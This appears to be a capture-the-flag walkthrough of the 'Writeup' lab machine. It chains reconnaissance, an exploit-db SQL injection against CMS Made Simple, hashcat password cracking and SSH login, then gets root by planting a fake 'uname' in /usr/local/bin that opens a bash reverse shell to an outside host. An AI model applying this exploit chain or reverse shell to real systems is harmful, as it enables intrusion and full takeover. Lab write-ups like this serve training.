$ nmap -p- -T4 -A 10.10.10.138
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey:
| 2048 dd:53:10:70:0b:d0:47:0a:e2:7e:4a:b6:42:98:23:c7 (RSA)
| 256 37:2e:14:68:ae:b9:c2:34:2b:6e:d9:92:bc:bf:bd:28 (ECDSA)
|_ 256 93:ea:a8:40:42:c1:a8:33:85:b3:56:00:62:1c:a0:ab (ED25519)
80/tcp open tcpwrapped
$ dirb http://10.10.10.138
$ nikto -h http://10.10.10.138
OWASP ZAP
http://10.10.10.138/writeup/
http://10.10.10.138/writeup/index.php?page=writeup
http://10.10.10.138/writeup/index.php?page=ypuffy
http://10.10.10.138/writeup/index.php?page=blue
http://10.10.10.138/robots.txt
# Disallow access to the blog until content is finished.
User-agent: *
Disallow: /writeup/
view-source:http://10.10.10.138/writeup/index.php?page=writeup
<meta name="Generator" content="CMS Made Simple - Copyright (C) 2004-2019. All rights reserved." />
jkr@writeup.htb
$ sudo npm i -g wappalyzer
$ wappalyzer http://10.10.10.138/writeup/ | jq
CMS Made Simple
CMS Made Simple < 2.2.10 - SQL Injection
https://www.exploit-db.com/exploits/46635
wget https://www.exploit-db.com/download/46635
python3 46635.py -u http://10.10.10.138/writeup
[+] Salt for password found: 5a599ef579066807
[+] Username found: jkr
[+] Email found: jkr@writeup.htb
[+] Password found: 62def4866937f08cc13bab43bb14e6f7
$ hash-identifier 62def4866937f08cc13bab43bb14e6f7
$ hashid 62def4866937f08cc13bab43bb14e6f7
$ echo '62def4866937f08cc13bab43bb14e6f7:5a599ef579066807' > hash
$ hashcat -a 0 -m 20 hash /usr/share/wordlists/rockyou.txt
62def4866937f08cc13bab43bb14e6f7:5a599ef579066807:raykayjay9
$ ssh jkr@10.10.10.138
jkr@writeup:~$ id
uid=1000(jkr) gid=1000(jkr) groups=1000(jkr),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),50(staff),103(netdev)
jkr@writeup:~$ cat user.txt
d4e493fd4068afc9eb1aa6a55319f978
PATH HIJACKING — the root-owned MOTD hook `10-uname` calls `uname` by relative name, and the PATH that run-parts receives (see the pspy output below) lists /usr/local/bin before /usr/bin; /usr/local/bin is group-owned by staff, which jkr is a member of, and the later `cp` into it succeeding shows that group can write there, so a same-named file placed there is what root runs at the next SSH login.
jkr@writeup:/etc/update-motd.d$ ls -la
total 12
drwxr-xr-x 2 root root 4096 Apr 19 2019 .
drwxr-xr-x 81 root root 4096 Aug 23 2019 ..
-rwxr-xr-x 1 root root 23 Jun 3 2018 10-uname
jkr@writeup:/etc/update-motd.d$ cat 10-uname
#!/bin/sh
uname -rnsom
jkr@writeup:/etc/update-motd.d$ uname -rnsom
Linux writeup 4.9.0-8-amd64 x86_64 GNU/Linux
kali@kali:~/0.htb/machines/Writeup138$ scp pspy32 jkr@10.10.10.138:/tmp
jkr@writeup:/tmp$ chmod +x pspy32
jkr@writeup:/tmp$ ./pspy32
2021/07/21 10:08:12 CMD: UID=0 PID=5732 | sshd: jkr [priv]
2021/07/21 10:08:12 CMD: UID=0 PID=5733 | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new
2021/07/21 10:08:13 CMD: UID=0 PID=5734 | run-parts --lsbsysinit /etc/update-motd.d
2021/07/21 10:08:13 CMD: UID=0 PID=5735 | /bin/sh /
2021/07/21 10:08:13 CMD: UID=0 PID=5735 | /bin/sh /etc/update-motd.d/10-uname
jkr@writeup:~$ groups
jkr cdrom floppy audio dip video plugdev staff netdev
jkr@writeup:~$ find / -group staff 2>/dev/null
/var/local
/usr/local
/usr/local/bin
/usr/local/include
/usr/local/share
/usr/local/share/sgml
/usr/local/share/sgml/misc
/usr/local/share/sgml/stylesheet
/usr/local/share/sgml/entities
/usr/local/share/sgml/dtd
/usr/local/share/sgml/declaration
/usr/local/share/fonts
/usr/local/share/man
/usr/local/share/emacs
/usr/local/share/emacs/site-lisp
/usr/local/share/xml
/usr/local/share/xml/schema
/usr/local/share/xml/misc
/usr/local/share/xml/entities
/usr/local/share/xml/declaration
/usr/local/games
/usr/local/man
/usr/local/src
/usr/local/etc
/usr/local/lib
/usr/local/lib/python3.5
/usr/local/lib/python3.5/dist-packages
/usr/local/lib/python2.7
/usr/local/lib/python2.7/dist-packages
/usr/local/lib/python2.7/site-packages
/usr/local/sbin
jkr@writeup:~$
jkr@writeup:/usr/local$ echo $PATH
/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
jkr@writeup:/usr/local$ cd /tmp
jkr@writeup:/tmp$ printf '#!/bin/bash' > uname
jkr@writeup:/tmp$ printf '\nbash -i >& /dev/tcp/10.10.14.136/4444 0>&1' >> uname
jkr@writeup:/tmp$ chmod a+x uname
jkr@writeup:/tmp$ cat uname
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.136/4444 0>&1
jkr@writeup:/tmp$ cp uname /usr/local/bin
jkr@writeup:/tmp$
kali@kali:~/0.htb/machines/Writeup138$ nc -lvnp 4444
kali@kali:~/0.htb/machines/Writeup138$ ssh jkr@10.10.10.138
jkr@10.10.10.138's password:
kali@kali:~/0.htb/machines/Writeup138$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.136] from (UNKNOWN) [10.10.10.138] 37290
bash: cannot set terminal process group (5762): Inappropriate ioctl for device
bash: no job control in this shell
root@writeup:/# id;pwd
id;pwd
uid=0(root) gid=0(root) groups=0(root)
/
root@writeup:/# cd /root
cd /root
root@writeup:/root# ls -la
ls -la
total 28
drwx------ 4 root root 4096 Aug 23 2019 .
drwxr-xr-x 22 root root 4096 Apr 19 2019 ..
lrwxrwxrwx 1 root root 9 Apr 19 2019 .bash_history -> /dev/null
-rw-r--r-- 1 root root 570 Jun 3 2018 .bashrc
drwxr-xr-x 2 root root 4096 May 1 2019 .nano
-rw-r--r-- 1 root root 148 Jun 3 2018 .profile
drwx------ 2 root root 4096 May 1 2019 bin
-r-------- 1 root root 33 Apr 19 2019 root.txt
root@writeup:/root# cat root.txt
cat root.txt
eeba47f60b48ef92b734f9b6198d7226
root@writeup:/root#